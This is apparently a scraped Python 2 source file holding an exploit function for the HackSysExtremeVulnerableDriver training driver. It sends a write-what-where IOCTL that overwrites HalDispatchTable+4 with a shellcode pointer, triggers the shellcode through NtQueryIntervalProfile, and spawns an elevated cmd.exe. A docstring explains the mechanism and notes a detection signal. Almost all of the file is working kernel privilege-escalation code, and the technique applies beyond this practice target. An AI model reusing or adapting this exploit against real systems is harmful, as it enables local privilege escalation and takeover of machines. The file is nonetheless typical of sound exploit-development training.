def trigger_arbitrary_overwrite():
    """Send the write-what-where request to HEVD, then check for elevation.

    Steps, as visible in this function:

    1. Open the HackSysExtremeVulnerableDriver device for read/write and
       exit the process if no handle is returned.
    2. Build an 8-byte request of two little-endian 32-bit fields: the
       address of a cell holding the payload pointer ("what") and the
       destination address ("where").
    3. Submit the request with IOCTL 0x22200B.
    4. Call NtQueryIntervalProfile, then use shell.IsUserAnAdmin() to
       decide whether to open cmd.exe or report failure.

    Reviewer notes:

    * The request is nothing but two caller-chosen pointers. The log line
      below implies the driver copies the value found at "what" to "where";
      a handler that validated both user-supplied addresses (for example
      with ProbeForRead/ProbeForWrite) would reject a kernel-space "where".
      The driver source is not part of this file -- confirm there.
    * "HDT" presumably means HalDispatchTable; get_HDT_kernel_address() and
      heap_alloc_payload() are defined elsewhere and are not shown.
    * 32-bit only: both fields are packed as "<L", and the buffer address
      is derived from the CPython 2 str object layout.
    * The DeviceIoControl result is never inspected; success is judged
      solely by IsUserAnAdmin() afterwards.
    * For detection, the observable end state is a cmd.exe child of the
      Python process running with admin rights.
    """
    device = kernel32.CreateFileA(
        "\\\\.\\HackSysExtremeVulnerableDriver",
        0xC0000000,  # GENERIC_READ | GENERIC_WRITE
        0,
        None,
        0x3,  # OPEN_EXISTING
        0,
        None,
    )
    if device == -1 or not device:
        print("[!] Driver handle not found : Error " + str(ctypes.GetLastError()))
        sys.exit()

    # [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
    payload_addr = heap_alloc_payload()
    target_addr = get_HDT_kernel_address() + 4

    # The request stores the address of this cell, not the payload address
    # itself, so the cell has to stay referenced until the IOCTL returns.
    payload_cell = c_void_p(payload_addr)
    what_field = struct.pack("<L", addressof(payload_cell))
    where_field = struct.pack("<L", target_addr)
    request = what_field + where_field

    # On 32-bit CPython 2, id() is the object's address and the str header
    # is 20 bytes long, so this is the address of the packed bytes.
    request_addr = id(request) + 20

    print("[+] Writing 0x%X at address 0x%X" % (payload_addr, target_addr))
    bytes_returned = c_ulong()
    kernel32.DeviceIoControl(
        device,
        0x22200B,
        request_addr,
        len(request),
        None,
        0,
        byref(bytes_returned),
        None,
    )

    print("[+] Calling NtQueryIntervalProfile to trigger vuln")
    interval = c_ulong(0)
    ntdll.NtQueryIntervalProfile(0x1337, byref(interval))

    if not shell.IsUserAnAdmin():
        print("[-] Exploit did not work. Re-run it!")
        return
    print("[*] Enjoy Elevated Privs !\r\n")
    os.system('cmd.exe')
HEVD_arbitraryoverwrite.py 文件源码